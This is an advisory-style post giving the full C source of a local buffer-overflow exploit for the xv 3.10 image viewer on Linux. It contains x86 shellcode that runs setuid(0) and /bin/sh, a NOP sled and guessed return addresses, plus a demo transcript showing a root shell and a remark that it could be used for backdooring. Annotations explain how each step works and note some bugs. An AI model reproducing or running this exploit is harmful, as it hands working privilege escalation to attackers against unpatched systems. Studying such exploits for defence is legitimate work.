There exists a buffer overflow vulnerability in the picture viewing program xv. As far as is known, version 3.10 is affected by the vulnerability. This is a proof-of-concept local exploit tested on Slackware [kernel 2.4.20].
Credit:
The information has been provided by dodo.
Exploit:
/*
Linux x86 "xv" local exploit
author: dodo <dodo@darkwired.org>
tested on: Slackware Linux (2.4.20), `xv` 'version 3.10'
date: 01-08-2003
notes:
could be used for backdooring purposes..
greets to everyone @ #darkwired
thanks to tsunami <tsunami@darkwired.org>
root@comprak:/dodo/edu/xv$ chmod a+s /usr/X11/bin/xv
dodo@comprak:/dodo/edu/xv$ ./dw-bof-xv
sh-2.05b# id
uid=0(root) gid=10(wheel) groups=10(wheel)
usage:
./dw-bof-xv [offset]
Slackware Linux offset: -200
contact:
http://www.darkwired.org/
dodo@darkwired.org
ssl-irc: irc.darkwired.org #darkwired
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/* Layout constant used by main(): the buffer is BSIZE+64 bytes and the
 * payload and return addresses are positioned relative to BSIZE. */
#define BSIZE 256
/*
 * Hand-assembled x86-32 Linux machine code (the payload). The trailing
 * bytes 2f 62 69 6e 2f 73 68 are the ASCII string "/bin/sh". main() only
 * needs its length, taken with strlen(); that works here because the array
 * contains no 0x00 byte before the implicit terminator.
 */
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x17\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x31\xd2\xcd"
"\x80\xe8\xe4\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x58";
/*
 * Return the current stack pointer.
 * Relies on the inline asm leaving %esp in %eax and on the function falling
 * off its end with no return statement: in standard C, using the value of a
 * non-void function that reaches `}` without returning is undefined
 * behaviour, and the register trick is x86-32 specific (the return value is
 * expected in %eax). NOTE(review): an optimising compiler need not keep %eax
 * intact between the asm statement and the return -- confirm with the
 * intended compiler and flags.
 */
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
/*
 * Build an over-long string, export it as $DODO and run xv with it as the
 * -name argument. The overflow itself is in xv (see the file header);
 * nothing here checks that the installed xv is actually the affected build.
 *
 * argv[1] (optional): decimal adjustment to the stack pointer, default -200.
 *   Parsed with atoi(), so non-numeric input silently becomes 0.
 * Returns -1 if setenv() fails, otherwise 1 -- a non-zero exit status even
 *   on the intended path, presumably unintentional.
 *
 * NOTE(review): memset(), memcpy() and strlen() are used but <string.h> is
 * not included; this relies on implicit declarations, which C99 removed and
 * current compilers reject or warn about.
 */
int main(int argc, char *argv[])
{
/* BSIZE+64 = 320 bytes. Filled below; never NUL-terminated inside the array. */
char buffer[BSIZE+64];
/* sp: stack pointer sampled by get_sp(); i: byte index into buffer. */
unsigned long sp = get_sp(), i;
signed long offset = -200;
if(argc>1) offset = atoi(argv[1]);
/* Guessed address = sampled %esp minus the offset (default -200, i.e. +200). */
sp = sp - offset;
//making our buffer
/* Fill the whole buffer with 0x90 (x86 NOP); the "slide" that tolerates an
 * inexact address guess. */
memset(buffer, 0x90, sizeof(buffer)); // NOP sled ("glijbaan" is Dutch for "slide")
/* Payload is placed so that it ends 16 bytes before offset BSIZE. */
memcpy(buffer+((BSIZE-strlen(shellcode))-16), (char *)&shellcode, strlen(shellcode));
/* 16 copies of sp starting at byte BSIZE-8 = 248, one per sizeof(sp).
 * With 4-byte longs the last write ends at 312 (< 320). With 8-byte longs it
 * would reach 376 and overflow `buffer` itself -- the code assumes 32-bit
 * x86. Storing through a long* into a char array also relies on alignment
 * and aliasing that the compiler is not required to honour. */
for(
i = BSIZE-8;
(BSIZE-8)+16*sizeof(sp) > i; //putting some return addresses
i+=sizeof(sp)) {
*(long *)&buffer[i] = sp;
}
/* BUG: buffer+sizeof(buffer) is one past the end of the array, so this NUL
 * is written outside `buffer` (undefined behaviour) and the array stays
 * unterminated; setenv() below then reads past it. A terminator inside the
 * array would be buffer[sizeof(buffer)-1]. */
memset(buffer+sizeof(buffer), 0x0, 1);
/* Overwrite an existing DODO variable; setenv() returns -1 on failure. */
if(setenv("DODO", buffer, 1)==-1) return -1;
/* $DODO is expanded unquoted by the shell and becomes xv's -name argument. */
system("xv -name $DODO");
return 1;
}